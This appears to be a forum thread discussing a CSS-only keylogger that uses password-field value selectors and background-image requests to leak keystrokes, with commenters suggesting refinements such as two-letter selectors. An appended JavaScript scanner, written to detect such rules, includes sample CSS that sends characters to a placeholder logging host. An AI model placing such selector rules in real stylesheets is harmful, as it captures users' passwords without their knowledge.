
Assuming the server receives the requests in the same order as the requests were sent, which on mobile networks isn't anywhere near so certain.


Not an efficient keylogger; however, if you know the pressed keys, you can just generate permutations ordered using probabilities, and that would be a lot faster than brute force.

The real deal here is, it depends on some js code updating the dom for each key press, which is BAAAD. Not a useless keylogger, because it reminds us of a vulnerability that is the product of choosing a bad decision.


Interestingly the password "BAAAD" would generate 3 requests to the logging server, since it wouldn't request the background image for the letter "A" more than one time. Or shouldn't, anyway.


That depends on cache headers sent from the server, which the attacker controls.


> it depends on some js code updating the dom for each key press

Like React with JSX?


It may be easier to XSS CSS than JS.


Even if the attacker got them out of order, it would let them be able to brute force guess in a small number of attempts.


For example, there are about 41,000 possible passwords for a given set of 8 characters, out of around 96^8 possible 8 character passwords (in the ASCII character set).


And if any of those are words or almost words, you'd guess that first and probably have it.


Where does 41000 come from?


It's 8! (8 factorial) which is 40320.

This is 127,286,426,869 (~128bn) times smaller than 92^8.

Edit: Note that if you have a repeated character in your 8 character password then the number of permutations of the set of 8 (7 distinct) characters is further halved to 20,160.


And just by doubling the amount of selectors you could always check for a repeated character! (AKA [value$=aa], [value$=bb], etc...)


Well it would also not come in the correct order if someone types their password wrong, deletes letters and re-types them, etc. But I assume the idea would be that you'd have a much easier time figuring out the password if you had all the keys they pressed.


You can just add the two (or more) letter permutations to the CSS to help to identify the previous characters (like [value$="aa"]).


Or the user corrects a typo by moving the cursor or using backspace. However I think the idea is that the keylogger will work on some or most users.


It'd be simple enough to add an 'order' identifier (request timestamp, etc) to the requests.

Edit: nm. My mistake, not as easy as that using only css!


Simple enough, in CSS?


My mistake, I guess I didn't really think that through...


Maybe with counter-reset?


Why would you even need an order identifier? All you need to do is check the request logs for your server; everything should be already in order.


I was replying to the comment above which pointed out correctly that the order in which the server receives the requests may differ from the order in which they were sent.
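
As an added illustration from the defender's side (not written by any commenter in this thread): a stylesheet scanner that flags the rule shape discussed above, a `value` attribute selector paired with a `url()` load. The function names, the three-rule threshold and the `logger.example` host are assumptions made for the example.

```javascript
// Added example (constructed): flag CSS rules that select on an input's value
// attribute and also fetch a URL, so each matched value causes a request.

// [value=..], [value^=..], [value$=..], [value*=..] inside a selector.
const VALUE_ATTR =
  /\[\s*value\s*([\^$*~|]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*(?:[is]\s*)?\]/gi;
// url(...) inside a declaration block.
const URL_FN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)/gi;

// One finding per rule that both matches on value and loads a URL.
function findValueExfilRules(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g; // innermost rules, incl. inside @media
  const findings = [];
  for (const m of css.matchAll(ruleRe)) {
    const selector = m[1].trim();
    const matchers = [...selector.matchAll(VALUE_ATTR)].map((a) => ({
      op: a[1],
      value: a[2].replace(/^["']|["']$/g, ""),
    }));
    const urls = [...m[2].matchAll(URL_FN)].map((u) => u[1] ?? u[2] ?? u[3]);
    if (matchers.length > 0 && urls.length > 0) {
      findings.push({ selector, matchers, urls });
    }
  }
  return findings;
}

// Assumed heuristic: several such rules, each with its own URL, is the
// per-character pattern; a single match is more likely ordinary styling.
function assess(cssText, minRules = 3) {
  const findings = findValueExfilRules(cssText);
  const distinctUrls = new Set(findings.flatMap((f) => f.urls)).size;
  const suspicious = findings.length >= minRules && distinctUrls >= minRules;
  return { ruleCount: findings.length, distinctUrls, suspicious };
}

// Constructed sample stylesheet; logger.example is a placeholder host.
const SAMPLE_CSS = `
.logo { background: url("/img/logo.png"); }    /* URL, no value selector */
input[value=""] { color: gray; }               /* value selector, no URL */
input[type="password"][value$="a"]  { background-image: url("https://logger.example/a"); }
input[type="password"][value$="b"]  { background-image: url("https://logger.example/b"); }
input[type="password"][value$="aa"] { background-image: url("https://logger.example/aa"); }
`;

console.log(assess(SAMPLE_CSS));
```

The scan works on stylesheet text, so it can run over third-party CSS before it is allowed onto a page that contains password fields.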



